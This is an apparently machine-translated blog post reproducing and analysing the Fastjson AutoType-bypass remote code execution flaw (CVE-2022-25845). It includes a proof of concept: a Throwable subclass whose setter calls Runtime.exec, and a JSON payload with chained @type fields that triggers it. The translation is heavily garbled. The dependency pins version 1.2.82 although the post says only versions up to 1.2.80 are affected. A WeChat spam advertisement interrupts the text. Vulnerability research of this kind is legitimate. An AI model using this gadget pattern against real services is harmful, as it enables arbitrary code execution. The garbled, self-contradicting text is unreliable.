Fastjson code execution cve-2022-25845

Vulnerability profile

　　Fastjson Code Execution Vulnerability , This vulnerability allows an attacker to bypass Fastjson Medium "AutoTypeCheck" Mechanism and realize remote code execution

　　 Affects version ：1.2.80 Up to , namely <= 1.2.80

Loophole recurrence

　　 We make use of idea establish maven project Build a loophole environment , stay pom Add... To the file

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.82</version>
</dependency>

　　 Create folder  com.example.fastjson

　　 Add two below java file

package com.example.fastjson;

import java.io.IOException;

public class Poc extends Exception {
    public void setName(String str) {
        try {
            Runtime.getRuntime().exec(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
　　

package com.example.fastjson;
import com.alibaba.fastjson.JSON;

public class PocDemo {
    public static void main(String[] args) {
        String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"com.example.fastjson.Poc\",\"name\":\"calc\"}";
        JSON.parse(json);
    }
}

　　 function PocDemo

【---- Help network security learn , All the following learning materials are free ！ Add weix：yj009991, remarks “ csdn ” obtain ！】

　① Thinking map of the growth path of Network Security Learning

　② 60+ Network security classic common toolkit

　③ 100+SRC Vulnerability analysis report

　④ 150+ Network security attack and defense technology ebook

　⑤ The most authoritative CISSP Certification test guide + Question bank

　⑥ super 1800 page CTF Practical skills manual

　⑦ A collection of the latest interview questions from Wangan factory （ With answers ）

　⑧ APP Client security detection guide （ Android +IOS）
 

Vulnerability analysis

AutoType

　　 We know that fastjson 1.2.25 After setting  autoType  Only open autoType after ,fastjson It is based on the built-in blacklist to achieve security , This may cause safety risks , Is to bypass the blacklist

　　 When not on , It is based on the white list , This vulnerability is not opened autoType When the .

　　 But it doesn't open autoType Time is based on white list , It is difficult to implement code execution , So we need to find a way Bypass AutoType Default disable policy , You can call any class

　　 Turn on autoType after , The final call is  

config.checkAutoType

　　com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class<?>, int)

　　 It declares various classes that are blacklisted , It records all kinds through hexadecimal , Can be in  fastjson-blacklist, See the name of the specific class

Throwable

　　 We noticed that in  

com.alibaba.fastjson.parser.deserializer.ThrowableDeserializer#deserialze

  Also called  

checkAutoType

　　 At the same time, we can find that  

com.alibaba.fastjson.parser.ParserConfig#getDeserializer(java.lang.Class<?>, java.lang.reflect.Type) 

It will detect whether the target class belongs to Throwable  An extension of , After that, it will call  

ThrowableDeserializer.deserialize()

　　 So the preliminary conclusion , If the target class belongs to  Throwable  Extension class of , You can open autoType Similar operations , To call any class

　　 To test this conjecture , Let's revise the file

package com.example.fastjson;

import java.io.IOException;

public class Poc extends Error {
    public void setName(String str) {
        try {
            Runtime.getRuntime().exec(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

　　 Success can still be exploited

　　 Continue to focus on functions  

com.alibaba.fastjson.parser.ParserConfig#getDeserializer(java.lang.Class<?>, java.lang.reflect.Type) 

Would call createException To create a deserialization function

　　com.alibaba.fastjson.parser.deserializer.ThrowableDeserializer#createException

　　 Finally, the function  

com.alibaba.fastjson.parser.ParserConfig#getDeserializer(java.lang.Class<?>, java.lang.reflect.Type) 

Code execution is implemented in

　　 So the whole vulnerability analysis is completed

Bug repair

　　 The following four repair methods are officially provided

　　● Upgrade to the latest version 1.2.83

　　● safeMode strengthening

　　●  Upgrade to fastjson v2

　　● noneautotype edition

Summarize and reflect

　　 The analysis of the whole vulnerability took a lot of time , According to the reference article  CVE-2022-25845 – Analyzing the Fastjson “Auto Type Bypass” RCE vulnerability  It's been a long time to add breakpoints and debug back and forth . Make a summary of this vulnerability . Not enabled by default AutoType when ,Fastjson Is based on the white list to get external classes , adopt Search for checkAutoType  Find out ThrowableDeserializer#deserialze  In the call , Of course, this is not the only place , But this place can be further used , By satisfying the class belongs to  Throwable  The extension class of can trigger , Finally, implement code execution . However, the use of this code in actual scenarios is more demanding , The first satisfying class is  Throwable  Extension class of , At the same time, there must be dangerous set Method .

More range experiments 、 Network security learning materials , Please click here >>https://www.hetianlab.com